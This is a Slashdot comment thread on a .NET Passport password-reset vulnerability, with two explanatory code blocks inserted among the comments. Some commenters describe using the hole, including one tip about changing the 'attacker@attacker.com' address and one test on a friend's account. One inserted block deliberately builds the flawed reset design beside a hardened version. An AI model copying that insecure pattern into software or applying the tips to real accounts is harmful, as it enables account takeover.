    Looks like that page is working again - perhaps the password reset screen has been repaired somehow? Don't have a hotmail account to test with...

    --
    "There is more worth loving than we have strength to love." - Brian Jay Stanley
    1. Re:Back up? by Kredal · · Score: 1

      it's back up, it told me that an email had been sent, but no email got sent. They probably just commented out the mail(); line.

      --
      Whoever stated that signature sizes should be limited to one hundred and twenty characters can just go ahead and kiss my
  75. Re:FUD by Opie812 · · Score: 1

    That is most definatly NOT a "fix". If they turn the service back on, guess what'll happen...

    OH OH OH, PICK ME!!! PICK ME!!!! I know!

    --
    I'm not a nerd. Nerds are smart.
  76. Re: Procedure to inform them it's broken. by BurritoWarrior · · Score: 1

    When I attempted to contact Microsoft about the problem, they asked me for a credit card number. When I explained I didn't want support and was trying to report a bug, I was transferred to someone else who... asked me for a credit card number. Wash, rinse, repeat.

    Dude,
    They were just trying to issue a refund to your credit card for the purchase price of Windows.

    (Pssst, I also have this wicked cool eBridge if you want it).

  77. Re: Procedure to inform them it's broken. by gr0nd · · Score: 1

    The traditional way on Bugtraq seems to be mailto:secure@microsoft.com.

  78. I have to go with the crowd here.... by AlphaSys · · Score: 5, Interesting

    I usually stand up for the Redmond boys if there's some bashing going on and not a lot of balance to the issue. But this is just an incredibly stupid hole to have open. Why would you ever, ever, ever pass details in the URL string that the user himself need not (and should not be allowed to) supply? If it is because you are passing it among servers in some fancy-schmancy web service scheme, then at least have the decency to hide the exploitable name/value pair in an http header or something (but even this should not be necessary for what they are doing, even if my guess as to how their backend works is wayyy offbase). Somebody said it earlier in the discussion that it is because developers (using the term lightly) add features without thinking of how to do it right and how to do it securely and just pass any old thing in the URL string, and they were right on the mark.

    Some coders (again using the term loosely) at my organization used to do this absolutely all the time and I would bitch about how piss poor it was from a security angle (and regularly demonstrate how easy it was to circumvent the intended "security" mechanisms). Everybody laughed at me when I did... that is until one of our largest customers hired an outside firm to audit the "security" of the apps they were getting. It took the firm very little time to discover these nuggets, of course. It is interesting to note that they reported that the application security was among the poorest they had seen, but that the server configurations (my department) were among the tightest. The sad thing is the stupid customer basically thought the two canceled each other out, threw some extra money at redesigning the application to meet the standards it should have to begin with, rewarded our systems team which had done it right the first time with absolutely squat, and renewed the contract for another five years. Shows you how much the corporate world understands what's really going on.

    --
    Can I bum a sig? I left mine at the office.
    1. Re:I have to go with the crowd here.... by MS_is_the_best · · Score: 2, Interesting

      I read your post, because I thought to have the same opinion: Microsoft software can have obscure exploits, just like every other (also open source) program, but this is really WAY too stupid. How can something this important to your company be SO easily exploitable?

      But I answer because your security idea of web apps is also very terrifying. Security through obscurity does not work! (passing variables in headers is no security, and choosing weird names is bad coding practice and not more secure). Proper way is to put in the url what you need (?page_nr=3) and keep at the server the stuff that is only used after proper authentication. Perhaps at a very unknown website obscurity would delay the script kiddies a bit, but I think hackers are really too much motivated to hack Passport, to not try something other than IE (telnet passport.microsoft.com 80?).

      But I'm glad you are a system administrator who knows how to secure his/her machines, those people are also too rare ....
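The principle stated in this reply (keep everything authorization-relevant on the server and let the URL carry only what the client legitimately chooses), applied to the password-reset flow the thread is about, as an added example that is neither the thread's nor Passport's code. `InsecureResetService` is a constructed toy of the two-address pattern IDIIAMOTS describes above: the address the link is mailed to arrives in the request next to the account being reset. `ResetService` is the hardened form: the only client input is which account to reset, the link carries a random, single-use, expiring token bound server-side to that account, and mail goes only to the address registered at sign-up. The hostnames, e-mail addresses, class names and the in-memory outbox are all placeholders made up for the example.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Outbox entries are (recipient, reset link); a real service would send mail.
Outbox = List[Tuple[str, str]]


@dataclass
class Account:
    email: str           # the address registered at sign-up, held server-side
    password_hash: str


def hash_password(pw: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as 'salt_hex$digest_hex'."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 100_000)
    return salt.hex() + "$" + dk.hex()


def verify_password(acct: Account, pw: str) -> bool:
    salt_hex = acct.password_hash.split("$", 1)[0]
    candidate = hash_password(pw, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, acct.password_hash)


class InsecureResetService:
    """The design the thread criticises (constructed toy, not Passport's code):
    the destination of the reset mail is taken from the request."""

    def __init__(self, accounts: Dict[str, Account], outbox: Outbox) -> None:
        self.accounts, self.outbox = accounts, outbox

    def request_reset(self, account_email: str, send_to: str) -> bool:
        if account_email not in self.accounts:
            return False
        link = f"https://reset.example.test/?account={account_email}&to={send_to}"
        self.outbox.append((send_to, link))  # goes wherever the request says
        return True


@dataclass
class PendingReset:
    account_email: str
    expires_at: float
    used: bool = False


def _token_hash(token: str) -> str:
    # Only a hash is stored, so a leaked pending-reset table cannot be replayed.
    return hashlib.sha256(token.encode()).hexdigest()


class ResetService:
    """Hardened flow: the client names an account and nothing else.  The token
    is random, single-use, time-limited and bound server-side to the account;
    the link is mailed only to that account's registered address."""

    TTL_SECONDS = 15 * 60

    def __init__(self, accounts: Dict[str, Account], outbox: Outbox,
                 clock: Callable[[], float] = time.time) -> None:
        self.accounts, self.outbox, self.clock = accounts, outbox, clock
        self.pending: Dict[str, PendingReset] = {}  # token hash -> record

    def request_reset(self, account_email: str) -> None:
        acct = self.accounts.get(account_email)
        if acct is None:
            return  # identical (empty) response either way: no account enumeration
        token = secrets.token_urlsafe(32)
        self.pending[_token_hash(token)] = PendingReset(
            acct.email, self.clock() + self.TTL_SECONDS)
        self.outbox.append((acct.email, f"https://reset.example.test/?token={token}"))

    def complete_reset(self, token: str, new_password: str) -> bool:
        # Lookup is by the hash of a 256-bit random token, so a failed probe
        # reveals nothing about valid tokens.
        rec = self.pending.get(_token_hash(token))
        if rec is None or rec.used or self.clock() > rec.expires_at:
            return False
        rec.used = True
        self.accounts[rec.account_email].password_hash = hash_password(new_password)
        return True
```

The difference is which side holds the binding between "this reset" and "this mailbox": in the toy, the request does, so whoever crafts the URL chooses where the link goes; in the hardened version the server does, and the URL only names the account, which is public anyway. The same token must also not be reusable after success or after its window, since a reset link sits in a mailbox indefinitely.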

    2. Re:I have to go with the crowd here.... by AlphaSys · · Score: 1

      No, you're right on. We agree to the letter. Obscuring by naming is not security. Obscuring by hiding it in the header is not security. And any serious malevolent is sniffin' ya or otherwise intercepting your transmissions to understand where to find what he wants of your data before he ever tries an exploit in a browser, telnet client, or even a custom app designed specifically to generate exactly the kind of packets your app expects to see. When I said "at least have the decency to..." I guess I should've prepended with "there is never a time when you should, but..."

      In a more general sense, what I was saying was "at least make 'em analyse packets to figure it out, don't let any dumbass who knows how to hover a link or "view > source" tell you how stupid you are. At least put up some kind of fight. Many of the coders here have had to be browbeaten about this. Some of them argue "My job is just to make this work. You make it secure." I have to make them understand that nothing can secure bad code. Sometimes I have to all but rewrite their code (or worse, redesign the app flow) to show them what's secure. And half the time, they come back and ask "OK, why is that better? My way is easier."

      I'm serious. Developers who really take security seriously to the extent that they design it into the app as opposed to "spray it on" after the fact are rare in the commercial world, unless they are working on products/projects that are specifically security-related. No one else seems to get it and they think it is infrastructure's job to make the insecure app secure. Good admins are so underpaid...

      --
      Can I bum a sig? I left mine at the office.
    3. Re:I have to go with the crowd here.... by AlphaSys · · Score: 1

      Fortunately for me, the boss and the two major PMs have learned to take me seriously on the subject. The boss just knows what he sees when the systems get audited; the PMs know it because they used to be core developers and I helped them fix the holes that got shot in their app designs.

      My problem is with some of the developers that have come in since that time to fill the slots left open as these two guys moved up to PMs and the projects expanded at the same time. What you end up with is twice as many folks working at the code level with half as much understanding of where the projects began, their roots. That's where a lot of bad decisions get made. And a lot of these new developers know how to make code do the basic stuff, but they don't have the knack for application design that the original architects did. And they think the only folks on par to tell them what their code should or shouldn't do (or even how to validate that it does operate as expected while developing) are the PMs or The Boss. Like I said, it is lucky for me those individuals listen to me now. Many of my disagreements with these dev guys have ended up nearly in fisticuffs, and they are much bigger than I am. And there's a lot of them compared to just me.

      --
      Can I bum a sig? I left mine at the office.
  79. Probably Microsoft code is difficult to maintain. by Futurepower(R) · · Score: 4, Interesting

    After months of trying to understand Microsoft's situation (Windows XP Shows the Direction Microsoft is Going), I came to the conclusion that the Microsoft management style leads to mountains of sloppy code that is difficult to maintain. That's the only theory that seems to fit. For example, in Internet Explorer browser alone, there have been for years more serious security bugs than Microsoft fixed. There are, at present, 14 security vulnerabilities.

    Here is the recent record. The list of defects has been similar for years. Also, this is a record only of security defects, not all defects:
    • June 18, 2002: 18 vulnerabilities
    • August 8, 2002: 22 vulnerabilities
    • September 9, 2002: 19 vulnerabilities
    • November 19, 2002: 32 vulnerabilities
    • December 9, 2002: 19 vulnerabilities. (Microsoft fixed 15 on Nov. 20, but two new ones were found.)
    • May 8, 2003: 14 vulnerabilities
    This is a terrible record for a company that has $52.9 billion in the bank. (See "Total Current Assets" in the upper left hand corner, which is the money available within the next few months. It takes time to spend a billion dollars, so the next few months is equivalent to cash.)

    Obviously, Microsoft could fix the bugs if the company wanted to fix them. But the company apparently lacks the will to devote the resources necessary (IE still does not have tabbed browsing), and apparently also, it is not easy.
  80. Lots of interesting methods... by djh101010 · · Score: 1

    A few months back, my company underwent a security audit from one of the third-party companies who do that sort of thing. It was truly beautiful watching their analysts do things to our web-app which we had never intended people to do. They're real artists.

    We're a small-ish company, these guys came in for a week, exposed some weaknesses and some stylistic quibbles, and they're fixed.

    If we can bring in an expert in this sort of thing, why can't Microsoft? Is it arrogance, apathy, or ignorance, or something else?

  81. Well by Bunji+X · · Score: 1

    They can always swallow their pride, scrap their insecure system and join the Liberty Alliance Project.

    --
    ---
    The combined human population is enough to feed every living tiger for app. 28000 years.
  82. in the words of homer by b17bmbr · · Score: 1

    simpson that is...

    DOH!!!

    --
    My problem? I was perfectly gruntled, until some numbnuts came by and dissed me.
  83. easy tabbed browsing by b17bmbr · · Score: 1

    open up VB. insert tab control. insert web browser control. add an add tab function. voilà, tabbed browsing.

    --
    My problem? I was perfectly gruntled, until some numbnuts came by and dissed me.
    1. Re:easy tabbed browsing by Prior+Restraint · · Score: 1

      open up VB.

      So, you're saying I can have tabbed browsing in IE for only $109 US? Pass.

    2. Re:easy tabbed browsing by b17bmbr · · Score: 1

      warez, dude, warez!!!

      --
      My problem? I was perfectly gruntled, until some numbnuts came by and dissed me.
    3. Re:easy tabbed browsing by Prior+Restraint · · Score: 1

      dialup, dude, dialup!!!

    4. Re:easy tabbed browsing by b17bmbr · · Score: 1

      bummer

      --
      My problem? I was perfectly gruntled, until some numbnuts came by and dissed me.
  84. Other ways in? Let's ask Google! by mnemotronic · · Score: 1

    A Google search on passport email "reset your password" yields some interesting links with (possible?) alternate URLs for this exploit. Is MSoft's domain the only place where this works? I would assume there's other sites that have bought into MS's security tripe and have setup passport servers, or is passport a central repository?

    --
    The Russians have won. They have made the world a cesspool of distrust, greed, fear and hate.
  85. Vulnerability still there by mencik · · Score: 1

    I just tried the attack with my own hotmail account and was able to change the password. For those of you trying, remember to change the attacker@attacker.com to another valid email account, or you won't receive the reset email message. That should be obvious, but apparently some posters hadn't figured that out.

  86. Re:FUD by etcpasswd · · Score: 1
    Insightful? Please!

    This is more like the mechanic giving you a rental car while he fixes your own car.

    1. Can you hear the screeching sound? No.
    2. Will the car stop? No.

    Compare your flawed analogy with MS:

    1. Is Passport still vulnerable? No.
    2. Is the Passport service working now? Yes.
    3. Will the users be able to change their passwords while Microsoft is working on it? No.
    4. Can MS get away with disabling the option to change passwords permanently? No.

    What was your point again?

  87. ha ha, funny not. by twitter · · Score: 1
    Passport is not the kind of thing you should take lightly. This might be amusing if Microsoft were not a monopoly and they were not trying to force this "one name one passport" as the end all for commerce, identification and control. "Kids Passport" is especially creepy and Orwellian. Microsoft is too big to ignore and the evil things they do should not be understood as just another fact you can't do anything about, such as the world being round.

    Sure, it's buggy. Police States are always incompetent. They also reassure their victims with crap like, " Sign in on any computer that has Internet access. .NET Passport uses powerful online security technology and follows a comprehensive privacy policy to help protect your profile information. You manage your information-sharing options." The Nazis were equal dullards but look how far they got. Incompetence does not keep you from being nasty, thorough and powerful.

    Paranoid yet? You should be. Microsoft is busy building tools and attitudes the most UnAmerican administration would value. They are just the kind of hacks the Nazis picked up and stuck into government and university positions. The time to fight the madness is now, before it becomes official.

    --

    Friends don't help friends install M$ junk.

    1. Re:ha ha, funny not. by grahamlee · · Score: 1
      Paranoid yet? You should be.

      Perhaps I might be, if I used a .NET Passport for any serious work. I don't, and the state of the world is not yet at the point where it should be deemed necessary for anything.

      I have a couple of passport accounts, one for .LINUX AMSN, and one for my WinXP account. Past my name (which is also in my Slashdot account details ;-) they contain no real information about me.

      Come to that, I don't tend to use long-term authentication information for anything. All of my online transactions are done once-off through companies with SSL transactions, and if they cannot provide this then I deal with them in person or not at all. I most definitely leave all One-Click-type functions off.

      So what am I wittering on about? Well, I think your Orwellian view of the Passport is not relevant now, nor do I think it is likely to be in the future. I know people who use their WinMachines for surfing the web and reading e-mail, maybe the occasional game of Minesweeper, who will not use Passport or any similar system, no matter how secure they claim to be, on the basis that it's stupid to. If you put all of your private information under the protection of someone you don't know then you effectively have no control over 0wn0rship of that information.

  88. Insightful by Futurepower(R) · · Score: 1

    What's even funnier about this is that it is modded, "Insightful".

    1. Re:Insightful by Reziac · · Score: 1

      Well, M$ does have more cash in hand than some small banks... Hey, why *don't* they get into the banking business? After all, they already have all the credit card information they need... ;)

      --
      ~REZ~ #43301. Who'd fake being me anyway?
  89. "Alternative" to Passport by nilsjuergens · · Score: 1

    Granted, single-sign-on is convenient, but you can achieve nearly the same convenience using mozilla (and probably any other browser).

    Just create a random password for every service you use, log in once and let mozilla store the username/password pair in the password manager and make sure access to the password manager is password protected. That way you only have to remember one password, but you still have different passwords for different sites which are reasonably secure (for they are randomly generated).

    Now if Mozilla supported tracking the age of passwords and telling you to generate a new password for a site once the password reaches a certain age, that would be great!

    --
    -- Having problems sending big files over the net? Try out Efisto (http://efisto.org)
    1. Re:"Alternative" to Passport by Anonymous Coward · · Score: 1, Insightful

      Then you need to make backups of the password file for mozilla because if you had a disk failure and you lost all of your random passwords then you would be screwed

    2. Re:"Alternative" to Passport by nilsjuergens · · Score: 1

      Why, of course! But with the OS I use, mozilla stores its stuff in my home dir, which I have to backup now and then anyway.

      And I also use el-cheapo software raid5 with ide drives, so it does not happen too often I actually need my backup.

      Backup of important files is always implied, but of course you can't mention it often enough :)

      --
      -- Having problems sending big files over the net? Try out Efisto (http://efisto.org)
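The scheme nilsjuergens describes (one master password, a randomly generated password per site, a password-protected store, and the age check the post wishes for), together with the backup point made in the replies, as an added example that is neither Mozilla's password manager nor code from the thread. It uses only the Python standard library: PBKDF2 derives separate encryption and MAC keys from the master password, the serialised entries are sealed with an HMAC-SHA256 counter-mode keystream and an encrypt-then-MAC tag, `stale()` lists sites whose password is older than a limit, and `export()` produces the single blob that needs backing up. The sealing construction is there to show the design with no third-party dependency; in production code an AEAD from a maintained library should take its place. Site names, usernames, the master passphrase and the timestamps are constructed for the example.

```python
import hashlib
import hmac
import json
import secrets
import string
import time
from typing import Callable, Dict, List, Optional, Tuple

ALPHABET = string.ascii_letters + string.digits + string.punctuation


def generate_password(length: int = 20) -> str:
    """Random per-site password drawn from the OS CSPRNG (never random.choice)."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def derive_keys(master: str, salt: bytes) -> Tuple[bytes, bytes]:
    """One master password -> separate encryption and MAC keys via PBKDF2."""
    km = hashlib.pbkdf2_hmac("sha256", master.encode(), salt, 100_000, dklen=64)
    return km[:32], km[32:]


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    # HMAC-SHA256 as a PRF in counter mode; each (nonce, block index) is used once.
    blocks = [hmac.new(key, nonce + i.to_bytes(4, "big"), "sha256").digest()
              for i in range((n + 31) // 32)]
    return b"".join(blocks)[:n]


def seal(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC under a fresh random nonce: nonce || ciphertext || tag."""
    nonce = secrets.token_bytes(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, "sha256").digest()
    return nonce + ct + tag


def open_sealed(enc_key: bytes, mac_key: bytes, blob: bytes) -> Optional[bytes]:
    """Verify the tag in constant time before touching the ciphertext."""
    if len(blob) < 48:
        return None
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(mac_key, nonce + ct, "sha256").digest(), tag):
        return None
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))


class Vault:
    """In-memory credential store; the on-disk form is whatever export() returns."""

    def __init__(self, entries: Optional[Dict[str, dict]] = None,
                 clock: Callable[[], float] = time.time) -> None:
        self.entries = entries if entries is not None else {}
        self.clock = clock

    def add_site(self, site: str, username: str, length: int = 20) -> str:
        pw = generate_password(length)
        self.entries[site] = {"user": username, "password": pw, "created": self.clock()}
        return pw

    def credentials(self, site: str) -> Tuple[str, str]:
        entry = self.entries[site]
        return entry["user"], entry["password"]

    def stale(self, max_age_days: int = 90) -> List[str]:
        """Sites whose password is older than the limit and due for rotation."""
        cutoff = self.clock() - max_age_days * 86400
        return sorted(s for s, e in self.entries.items() if e["created"] < cutoff)

    def export(self, master: str) -> bytes:
        """Serialise and seal under the master password: salt || sealed JSON."""
        salt = secrets.token_bytes(16)
        enc_key, mac_key = derive_keys(master, salt)
        return salt + seal(enc_key, mac_key, json.dumps(self.entries).encode())

    @classmethod
    def load(cls, blob: bytes, master: str,
             clock: Callable[[], float] = time.time) -> Optional["Vault"]:
        """None on a wrong master password or any modification of the file."""
        salt, body = blob[:16], blob[16:]
        enc_key, mac_key = derive_keys(master, salt)
        plaintext = open_sealed(enc_key, mac_key, body)
        return None if plaintext is None else cls(json.loads(plaintext.decode()), clock)
```

Because the key is derived from the master password with a slow KDF and the file carries an authentication tag, a wrong passphrase and a tampered file are indistinguishable to the caller (both return `None`), which is what you want: nothing about the stored passwords is decrypted before the tag checks out. Losing the exported blob loses every site password, which is the backup point made in the replies.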
  90. Insightful? Oh please. by Petersko · · Score: 1

    I learned about this in a CS course, and I couldn't help thinking, "duh, any sensible person wouldn't be that stupid..." Obviously I was wrong.

    Another CS student wondering why everybody seems so gosh darn stupid while they are so obviously bright is hardly noteworthy. The post comes down to "Duhh.... they done BAD!", and it gets a +5 insightful?

    1. Re:Insightful? Oh please. by Larsing · · Score: 1

      Imagine what the world would be like if students didn't forget all these obvious wisdoms once they've gotten their MSc?

      Imagine all the people... ...surfing the web in peace.

      --
      Ethics is what you say you do. Morals is what you actually do.
  91. Anti-Microsoft Groups? by simetra · · Score: 1

    Is/are there any Anti-Microsoft advocacy groups out there? I'm talking about respectable, legitimate groups that have seriously documented how and why Microsoft's practices are bad. I'm not talking about Joe H4X0R's I-Hate-Microsoft geocities webpage.

    If not, perhaps there should be, with the goal to educate people who help MS - the suits who are suckered in to the Ad campaigns and really have no idea about such things.

    Thanks.

    --

    "Would it kill you to put down the toilet seat?" -- Maya Angelou
  92. Re:STILL NOT FIXED by madcarrots · · Score: 1

    I tested it with a friend's account. It seems that a page comes up displaying the message that the email has been sent; however, it has not arrived in my inbox.

    --
    "Knock the stones together, guys!"
  93. How do I close a .Net Passport account? by bblackfrog · · Score: 2, Interesting

    This may be a naive question, but how do I go about closing a .Net Passport account? I want Microsoft to remove all of my personal information from their servers.

    There seems to be no way to do this online. A call to MS customer service resulted in an "I dunno, I can't do that." answer.

    btw, I'm not dumb enough to actively participate in Passport. I bought something online last summer from a small company, and after completing the purchase, I was shocked to see that Microsoft was handling the transaction with Passport. Damn it! Now they have my credit card info, shipping address, etc. Guess I should have read the fine print before I clicked Submit...

    Anyone successfully done this?

  94. Re:And the open source community... by sqlrob · · Score: 1

    Isn't that what PAM is?

  95. Re:FUD by hellswraith · · Score: 1

    The service still works. What they did is turned off a "FEATURE" that allows you to change your password. They may implement new code on that feature to make it more secure than in the past, then they may choose to turn that "FEATURE" back on. It is NOT required for the service to be used, therefore it was a FIX. They plugged the hole. Simple. Sure, they took away a feature to do this, but it was still fixed. Now they may redeploy this feature later, but then it will be an upgrade to the service.

    To answer your question, if they stopped everyone from logging on, then the service would be UNUSABLE, then it would NOT be a fix.

  96. Re:FUD by N3WBI3 · · Score: 2, Insightful

    So if I am an ISP and I have a hole in my service, is unplugging the server a fix?? That is basically what they did. Now it's the right thing to do (make sure nobody can change **until** you have it fixed)..

    --
  97. Re:FUD by N3WBI3 · · Score: 1

    No, it's like a locksmith putting glue in the keyhole of your door when you need him to let you in because you lost your key! Well, we know nobody can use your lost key to get in, so it's fixed, right?

    --
  98. Fun Code by Adam9 · · Score: 1

    This is off of their forgotten password page. Can you give us more code please? Thanks.

    To reset your Microsoft® .NET Passport password, please enter the following information and then click Continue.

    Help
    {{if RSP._isHotmailMode }}{{else}}{{endif}}

  99. *Sigh* by White+Roses · · Score: 2, Funny
    The unfortunate thing is that I don't know anyone who is both (a) stupid enough to use Hotmail and (b) grotesquely stupid enough to store personal information in Passport.

    I need to make some stupid friends, it seems. Well, friends who are more stupid than the ones I have now, at any rate.

    But it's a good exploit, anyway. Kudos to the person who slaved for almost 15 minutes to figure it out (that's not a slander against the cracker in question, but against the pathetic sec- . . . secuuu- . . . jeez, I can't even call it what MS wants me to think it is).

    --
    Do not touch -Willie
  100. YES Re:How do I close a .Net Passport account? by redwoodtree · · Score: 2, Informative

    Yes, in fact if you log in and go to your profile, there's a link in the bottom left hand nav that says "CLOSE .NET PASSPORT ACCOUNT"

    You click on that, agree to their terms and close your account right there in three clicks.

    Good luck

  101. Re:People still use POP? by Gleeb · · Score: 1

    They do. At least, my ISP does (BT, the national telco) as well as Gamespy. Never really tried IMAP, to be honest. I thought it was legacy. But then it may be and you're all laughing at me :(

  102. Not fixed yet... by TrIp0d · · Score: 1

    Yeah, ha! Trustworthy computing! Sure...no, it's not fixed yet. I just checked it out (on my own hotmail account, of course).

  103. Muhammad Faisal Rauf Danka should be thanked! by Jerry · · Score: 1

    He could have given that info to terrorists and they could have funneled pilfered monies into all sorts of dangerous activities. By doing his best to expose the flaw he has, no doubt, saved many lives.

    --

    Running with Linux for over 20 years!

  104. Pump & Dump by SgtChaireBourne · · Score: 1
    Given that there is a history of questionable accounting practices, the accuracy of $ 52 900 000 000 current assets seems somewhat shaky. Especially since it is ultimately self-reported, albeit via Yahoo via Edgar. Enron was looking mighty good for a long while, too.

    That Microsoft could have fixed many more bugs is something that could be seen as one possibility, but only in the past tense. It looks like things got out of hand a while ago and that the management could be just riding the company down - pump and dump.

    Don't forget that benefits have been cut way back and there's also been outsourcing like mad. Consultants and contractors don't show up as layoffs when you let them go.

    --
    Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
  105. Better Hidden Flaws and Vulnerabilities? by webzombie · · Score: 1

    Yet another post about flaws and vulnerabilities in yet another Microsoft product or almost-product, and it got me a-thinkin' that there seems to be a slight undercurrent of familiarity to this scenario.

    I think possibly Microsoft has found a way to use its own flawed products to convince politicians and the like that a hard-wired security system is inevitable.

    And if MS is going to control this technology then they will most certainly use it to not only dominate existing and new markets but they will also use it to hide their own flaws and vulnerabilities.

    Any security technology that is likely to have the impact such as MS's Trust-Worthless Computing could have should be a public and open source technology or standard not another monopolistic revenue source...

  106. Re:FUD by caluml · · Score: 1

    What's the betting they've just renamed it? Try emailpwdreset2.srf or similar, lol ;)

  107. deja vu? by m1chael · · Score: 1

    it happens when they change something in the redmond.

    --
    I know you are psychotic, but please make an effort.
  108. Re:FUD by HiThere · · Score: 1

    It's bad, but it *is* much improved for anyone who stores anything sensitive on hotmail/passport. Remember "Dingbats have rights too".

    --

    I think we've pushed this "anyone can grow up to be president" thing too far.
  109. Re:FUD by ymgve · · Score: 2

    Does the word 'damage control' mean anything to you?

    404ing the page took them 2 minutes, and now all users are relatively secure again. If Microsoft had done nothing while they fixed the bug, several million hotmail accounts would still be vulnerable, and would probably stay that way for at least a few hours.

  110. Re: .sig (OT) by @madeus · · Score: 1

    Microsoft Rule #3: GUI standards are no longer necessary. Shiny objects are always user-friendly.

    I think this can be even more appropriately applied to Apple too (after all the years of UI guidelines that went out the window with Mac OS X ;).

  111. Re:FUD by girl_geek_antinomy · · Score: 1

    Oh, very true. I guess my point was that their response (canning the service), though surely the only good first response, doesn't justify 'stop having a go at Microsoft, look how well and quickly they've fixed it' type responses. Amputation != Cure.

  112. .NET ads by DJ+Rubbie · · Score: 1

    Wow, a .NET advertisement under a .NET vulnerability article!

    --
    Please direct all bug reports to /dev/null
  113. Re: Procedure to inform them it's broken. by NickFitz · · Score: 1

    A similar one bit me when I was upgrading my machine the other year.

    I'd installed an AMD K2 running at 500MHz, and Windoze 95 crashed at the point of initialising the desktop. Booting into DOS worked fine, so the machine wasn't broken. A search of the Knowledge Base showed that this was a known bug on AMD processors running over ~300MHz, and a patch was available.

    Downloaded the patch to a floppy, put it in the machine, tried to run it from the command line, got the message:

    This program can only be run under Windows

    To labour the point: this patch fixed a bug which prevented Windows from starting.

    --
    Using HTML in email is like putting sound effects on your phone calls. Just say <strong>no</strong>.
  114. I trust Microsoft!!! by Black+Copter+Control · · Score: 1
    I trust them to produce insecure software.

    Needless to say, I'm writing this from a Linux box.

    --
    OS Software is like love: The best way to make it grow is to give it away.
  115. Re:Probably Microsoft code is difficult to maintai by Gauchito · · Score: 1

    It's backwards. What incentive does a company have to change, when its current habits have netted it $52.9 billion in cash?

  116. MS problem is their own culture and codebase by Genus+Marmota · · Score: 5, Interesting
    I don't mean to bash MS (there are so many on /. that do it so well) but realistically these kinds of security problems are very unlikely to stop happening. If you've worked there as a dev, even if only for a few months, you probably have a good idea why this is. It's not because people are uncaring or incompetent. The big obstacles are 1) their own history and culture and 2) the enormity of their codebase. Here's why I think so.

    If you've made any study of it at all you know that effective security results from a process that starts before the software is even written. There is no protocol that will save you from logic errors (like the latest Passport hole). To do this requires a good understanding by the devs of security and their adherence to design principles and coding practices. To do that you need a software development methodology that enforces the consistent application of those principles and practices. Therein lies the problem.

    In my little corner of MS (though by all accounts it was typical of the company as a whole) what was prized above all was meeting requirements and deadlines. Virtually no energy was put into the development environment (hence the hour I spent every morning just downloading the nightly build, the insane .bat scripts, constantly fixing my own NT install as a $55/hr contractor). Nobody got "c-hours" for making life easier. More importantly, there was little value placed on design, good technique. Lip service was paid in meetings and reviews, of course, and superficial style details received obsessive scrutiny. Code reviews often bogged down on correct Hungarian notation but a unit test consisting of "return true" was perfectly ok. The "heroes" were people with big brain muscles who spent nights and weekends hammering out code to meet the latest deadline.

    The result of all this was a coding culture that I called the kingdom of cut-and-paste. I was actually encouraged to write routines by starting with someone else's routine to do something unrelated and editing it to do my task. A colleague would stand over my shoulder browsing the codebase looking for something convenient to steal. It was a shock to realize how little code people actually wrote. This is one of the things that I hated about working there, that I spent so much of my time fscking with the various APIs, incomprehensible include file hierarchies and so little time writing C++.

    Well, in my Intro to Fortran class in '77 the prof explained why massive code duplication is a bad idea, and the results are visible in every MS product. You can't fix a bug in one place, you have to fix it every place it got copied to, and you don't know where those are. The codebase is now on the order of 100'sM lines or better? Probably not even MS has a good handle on this, because they can't know for sure how much duplication (with tiny variations) there is (clue: lots).

    Once a company grows to a considerable size it's really hard to change the culture. I've seen this at several startups. MS is like a battleship or an aircraft carrier. High-tech and deadly but turning that boat around is really hard and simply may not happen in a short distance. Expecting them to change their performance WRT security in a few months (or a year) is kind of like expecting the old Soviet apparatchiks to start respecting civil liberties and human dignity because the Central Committee sends out a memo. Good luck. It's a city unto itself in Redmond, its own little world. And even if you did, what the hell are you going to do about the millions of lines of (largely incomprehensible) code in the installed base? The millions of systems in the wild that are unpatched and unmaintained?

    I see many of the same disasters being recapitulated in .NET. They may talk security and I'm sure they're trying hard but I expect that their long term strategies are going to rely more on legislation than the (probably impossible) task of bringing their products t

    1. Re:MS problem is their own culture and codebase by Sanga · · Score: 1

      Order can be returned to the "kingdom of cut and paste" by reviewing the source points of original code.

      Come ye whose work has been pirated by MS -- come forward to deliver once more for the betterment of humanity and help MS undo the tangle of copied and pasted code.

  117. cool by La+Camiseta · · Score: 1

    So now maybe I can get back that account that I forgot the password for. Sweet.

  118. Whew! by oaf357 · · Score: 1

    Glad I used a totally unique password and didn't provide any REAL information to those .NET clowns.

  119. Re: Procedure to inform them it's broken. by seangw · · Score: 1

    The only way that I've gotten to a level where I could almost "report" a bug would be after dealing with tech support (@ $250 / incident) for a few days.

  120. Trolled to death... by wirelessbuzzers · · Score: 1

    Why must this be the fate of the good jokes? That and "the infidels are committing suicide at our firewall" were the best I'd heard in awhile, but now they're just old...

    Quit ruining all the good jokes!

    --
    I hereby place the above post in the public domain.
  121. .NET vulnerability variation by Chatmag · · Score: 1

    Chatmag.com last week had reported a similar vulnerability, coming in an unsolicited email with the subject: "Someone has sent you an Insta Kiss". Clicking the link in the email takes a user to a site hosted on a server in The Netherlands, with what appears to be a valid Hotmail/Passport login screen. It actually captures a user's username and password. We informed Microsoft on the 3rd of May, and the site was removed. The email in question is still being sent to users; the link referenced in the email is now out of service.

    --
    Pete Carr Owner Chatmag.com
  122. On no my spam!! by wendigo2002 · · Score: 1

    So my spam isn't safe at hotmail anymore?

  123. Weeell... if they really want to... go for it by UTPinky · · Score: 1

    Oh well... so all this means is someone can break in and read the 30 pieces of spam I get in that account every day... *shrug* hope they enjoy themselves...

    --
    I'm only paranoid because everyone is against me...
  124. culture of security by aphor · · Score: 2, Interesting

